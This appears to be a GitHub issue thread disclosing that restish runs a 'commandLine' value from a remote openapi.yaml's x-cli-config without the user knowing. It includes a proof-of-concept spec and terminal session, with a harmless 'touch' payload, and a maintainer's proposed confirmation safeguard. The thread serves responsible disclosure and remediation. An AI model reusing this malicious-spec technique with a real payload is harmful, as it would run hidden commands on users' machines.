Security: rouge openapi.yaml can run commands in the user context

[NeuroWinter]

The external tool that is part of the auth module can be easily abused to run rouge commands in the user context.
This poses a threat as this is completely hidden to the user. I know the feature itself was designed to make life easier for auth, if a user has scripts that will generate keys, but this is easily abused.

The issue is this line here: https://github.com/rest-sh/restish/blob/main/cli/auth.go#L109

That will run whatever is in the commandLine key under x-cli-config eg:

neuro on Berne in ~ restish --version
restish version dev-2026-02-14-09:27
neuro on Berne in ~ ls ~/ohno.txt
"/home/neuro/ohno.txt": No such file or directory (os error 2)
neuro on Berne in ~ restish api configure testing https://test.armitagesarchive.com/
Found API auto-configuration, setting up default profile...
? Select option Save and exit
neuro on Berne in ~ restish testing get-users
HTTP/2.0 404 Not Found
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 9cd713153ac7d9a2-AKL
Content-Encoding: br
Content-Type: text/html
Date: Fri, 13 Feb 2026 20:28:51 GMT
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=9oXJcMWPFqPOavJrit88z3JWUNXS8Eolg3CY6lqt8OkGYBuxLzG7rggIAotvkBzp5IocL8L2jhA%2FtS6nHAn9lRleYgDOaLbm8ntec9BPEzmhExkJdg5Y9zdDZ%2F9cyR4Q1ORQ"}]}
Server: cloudflare
Vary: accept-encoding
X-Clacks-Overhead: GNU Terry Pratchett
X-Varied-Accept-Encoding: deflate, gzip, br

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.29.5</center>
</body>
</html>
neuro on Berne in ~ ls ~/ohno.txt
/home/neuro/ohno.txt
neuro on Berne in ~ curl https://test.armitagesarchive.com/openapi.yaml
openapi: "3.1.0"
info:
    title: Honnest not bad stuff here at all
x-cli-config:
    security: "external-tool"
    params:
        commandline: "touch ~/ohno.txt"
components:
    securitySchemes:
        external-tool:
            type: apiKey
            in: header
            name: X-Dummy
paths:
    /users:
        get:
            summary: Get users
            responses:
                "200":
                    description: Success

This is a super simple PoC but it can be used to extract any sort of info from the users machine.

[cfunkhouser]

Yikes! Thanks for pointing this out, @NeuroWinter.

I don't know how widely used the x-cli-* extensions are from within OpenAPI specs, or how annoying it would be for us to introduce some additional friction around them while configuring APIs with them. My instinct is to add a notice at sync time that the extensions exist, and have an interactive confirmation that the user is willing to accept the risk. This check could be circumvented with a flag like --blindly-accept-cli-extensions so that we have an escape hatch for automation workflows.

I'll start crafting a PR with those changes. In the meantime, it would be great if @danielgtaylor or other seasoned users of Restish could chime in with opinions on that approach.